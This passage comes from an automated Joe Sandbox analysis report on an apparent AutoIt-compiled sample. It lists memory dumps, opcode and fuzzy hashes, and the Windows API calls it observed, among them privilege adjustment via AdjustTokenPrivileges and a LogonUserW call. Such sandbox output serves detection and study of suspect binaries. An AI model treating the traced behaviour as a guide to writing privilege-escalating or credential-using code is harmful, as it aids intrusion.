                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: 4eacf1ae157d20aac90d273d5321cfdef0a26d74e5fae20b0730d7eba7705bf1
                                                                                                                • Instruction ID: 919a5b6384692f4a8938330daf20b9b5388102664e950906bd5028c2427372cc
                                                                                                                • Opcode Fuzzy Hash: 4eacf1ae157d20aac90d273d5321cfdef0a26d74e5fae20b0730d7eba7705bf1
                                                                                                                • Instruction Fuzzy Hash: 1DF0823554522DBBDB61AFA4CC48FEA776EBF09361F004269F919D6181DA309A40CBE1
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658309), ref: 006581E0
                                                                                                                • CloseHandle.KERNEL32(?,?,00658309), ref: 006581F2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: 4f6c9c2d531e3011ccd5ad3575200bff6407341cd795b51d7b7aa6bd87e9ad9e
                                                                                                                • Instruction ID: 0ae0a22979e15a5da6eb5d3b27fc636182cb5ca5eeb0fd5c49687ffa464a1074
                                                                                                                • Opcode Fuzzy Hash: 4f6c9c2d531e3011ccd5ad3575200bff6407341cd795b51d7b7aa6bd87e9ad9e
                                                                                                                • Instruction Fuzzy Hash: 7DE04F31000911AFE7212B60FC04D737BABEB04310710892DB89580831CB215C90DB10
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00628D57,?,?,?,00000001), ref: 0062A15A
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0062A163
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
                                                                                                                • Instruction ID: 1d883a3215d42a99e09cffeced93c567c02d11e6a282e1bbdfda2c2b38d78416
                                                                                                                • Opcode Fuzzy Hash: 528c12e6940bdc116ac50c33d42fc11a23e94e2aeacba7d62b7873e01a2d0555
                                                                                                                • Instruction Fuzzy Hash: 50B09231254308BBCB002B91EC09B883F6AEB46AA2F405120F60D84060CF6254508BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
                                                                                                                • Instruction ID: a3c3502b8db498f2a13831ebf6168cd5d40a0d004d690b806e946c1a5d51f5cb
                                                                                                                • Opcode Fuzzy Hash: 16644714f4ee22c97cd6b454abf6f9ec9bf57d0cd3d74379b1264f15b4cb8bec
                                                                                                                • Instruction Fuzzy Hash: C332E321D29F114DD7239A34E832336A25EAFB73D4F15D737E81AB5EA9EB29C4834500
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
                                                                                                                • Instruction ID: 1fefb13f732117c3abf094b6eb170ce72778efcfdc621a3517c1666d1782a983
                                                                                                                • Opcode Fuzzy Hash: e3a9f6db0ba8f8dba53147fb166ac54528a1a511952e9f05e0b0f9d665788b2a
                                                                                                                • Instruction Fuzzy Hash: B3B10130D2AF414DD7239A398831336B69DAFBB6C5F51E71BFC2674D22EB2185834181
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00658389), ref: 006587D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
                                                                                                                • Instruction ID: 9b3d629fd4761fee4c5312106b7507c25b69b6e53042291c7c6e86a9f9941d31
                                                                                                                • Opcode Fuzzy Hash: 8a2a2a0af035ab8cc3dee838d89e71f7b25f45f2d57455d311e65c0f8de382fc
                                                                                                                • Instruction Fuzzy Hash: B6D09E3226450EBFEF019FA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062A12A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
                                                                                                                • Instruction ID: 74536e93a555ca0174a3be9061235ca17af4f7d0f7f882f9a06e387711d463c8
                                                                                                                • Opcode Fuzzy Hash: 03b2a213b34f45b6bc5e8679e01725620a5108d51607276702b14d7262014a7c
                                                                                                                • Instruction Fuzzy Hash: D8A0113000020CBB8B002B82EC08888BFAEEA022A0B008020F80C800228F32A8208AC0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 46e7bd3a4f85709a6116437ab73e89ef84af6fcc59c0d28b058ebce056209194
                                                                                                                • Instruction ID: e21dc2ed26edd3dfe0f7bfd8513642d98b4481470a97187c4dff51c635e5bc47
                                                                                                                • Opcode Fuzzy Hash: 46e7bd3a4f85709a6116437ab73e89ef84af6fcc59c0d28b058ebce056209194
                                                                                                                • Instruction Fuzzy Hash: 5E2213309045068FDF388A28C4A87FC7BA3BF01345F2C856AE9478B692DB749DD6C741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                • Instruction ID: b770ffa99313a6f748db1fc15da66a495b8ef8f2ecdb2844d543801f2ea643c1
                                                                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                • Instruction Fuzzy Hash: 8AC197322094734ADB2D4639E4340BEBBA25EA37B131A176DD4B3DF2D4EE10D966DA10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                • Instruction ID: e7cc3fcab7fac4fa7f49513cd97752f661c0bdab8e4c74527c88a32fd57b73c3
                                                                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                • Instruction Fuzzy Hash: C2C197332095B34ADF2D463AD4340BEBAA25EA37B131B176DD4B2DF2D4EE10C965DA10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction ID: 8a21e76794810370fafc15c5246927344331ae88dbcea3b004b24fa1639207ae
                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction Fuzzy Hash: 9AC1A63624D4B34ADF2D463994341BEBAA25EB37B131B176DD4B2CF2C4EE20C965DA10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                • Instruction ID: b048e160791849b041d731b0ef6a4d4e63d5ef565cc7808e7990503080a87ebb
                                                                                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                • Instruction Fuzzy Hash: F941D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                • Instruction ID: e99db1eebf2cb534956c40a81c6824a90527350c608438361c24a1ac9cef9df8
                                                                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                • Instruction Fuzzy Hash: 5D019278A01109EFCB44DF98C5909AEF7B6FF48310F60869AE90AA7701D730AE41DB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                • Instruction ID: f5a7a09a4b8519b7970ee45cb6f3cb771ae728322c246d6b1d4cf288b8d8fec3
                                                                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                • Instruction Fuzzy Hash: FF019278A00109EFCB44DF98C5909AEF7B6FB48310F20859AE91AA7701E730AE41DB80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0067785B
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0067786D
                                                                                                                • DestroyWindow.USER32 ref: 0067787B
                                                                                                                • GetDesktopWindow.USER32 ref: 00677895
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0067789C
                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006779DD
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006779ED
                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677A35
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00677A41
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00677A7B
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677A9D
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677AB0
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677ABB
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00677AC4
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677AD3
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00677ADC
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677AE3
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00677AEE
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677B00
                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00692CAC,00000000), ref: 00677B16
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00677B26
                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00677B4C
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00677B6B
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677B8D
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677D7A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: 28a5487cf989e40a3081c9e378973c9a384451a9494badbd4a00b80310e0180b
                                                                                                                • Instruction ID: 1c0be31942dd45ec469acf5a34be8fb185678f4a55cd5638c7fc989500a7d449
                                                                                                                • Opcode Fuzzy Hash: 28a5487cf989e40a3081c9e378973c9a384451a9494badbd4a00b80310e0180b
                                                                                                                • Instruction Fuzzy Hash: B1026C71900115EFDB14DFA4DC89EAE7BBAFF48310F108268F919AB2A1D774AD41CB60
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,0068F910), ref: 00683627
                                                                                                                • IsWindowVisible.USER32(?), ref: 0068364B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpperVisibleWindow
                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                • API String ID: 4105515805-45149045
                                                                                                                • Opcode ID: 495e162fc4f8a9b9b28f8f0f44fea99eb42c7ed34e85609e62bb1bdcd5632165
                                                                                                                • Instruction ID: cc09071863c5c083f5c1d95eb4817726a96a0e5091d00235fbd9d414692c37cc
                                                                                                                • Opcode Fuzzy Hash: 495e162fc4f8a9b9b28f8f0f44fea99eb42c7ed34e85609e62bb1bdcd5632165
                                                                                                                • Instruction Fuzzy Hash: CCD17E702043219BCB48FF10C451AAE7BA7AF95754F144A6CF8825B3A3DB31EE4ACB55
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0068A630
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0068A661
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0068A66D
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0068A687
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0068A696
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0068A6C1
                                                                                                                • GetSysColor.USER32(00000010), ref: 0068A6C9
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0068A6D0
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0068A6DF
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0068A6E6
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0068A731
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 0068A763
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0068A78E
                                                                                                                  • Part of subcall function 0068A8CA: GetSysColor.USER32(00000012), ref: 0068A903
                                                                                                                  • Part of subcall function 0068A8CA: SetTextColor.GDI32(?,?), ref: 0068A907
                                                                                                                  • Part of subcall function 0068A8CA: GetSysColorBrush.USER32(0000000F), ref: 0068A91D
                                                                                                                  • Part of subcall function 0068A8CA: GetSysColor.USER32(0000000F), ref: 0068A928
                                                                                                                  • Part of subcall function 0068A8CA: GetSysColor.USER32(00000011), ref: 0068A945
                                                                                                                  • Part of subcall function 0068A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068A953
                                                                                                                  • Part of subcall function 0068A8CA: SelectObject.GDI32(?,00000000), ref: 0068A964
                                                                                                                  • Part of subcall function 0068A8CA: SetBkColor.GDI32(?,00000000), ref: 0068A96D
                                                                                                                  • Part of subcall function 0068A8CA: SelectObject.GDI32(?,?), ref: 0068A97A
                                                                                                                  • Part of subcall function 0068A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0068A999
                                                                                                                  • Part of subcall function 0068A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068A9B0
                                                                                                                  • Part of subcall function 0068A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0068A9C5
                                                                                                                  • Part of subcall function 0068A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068A9ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
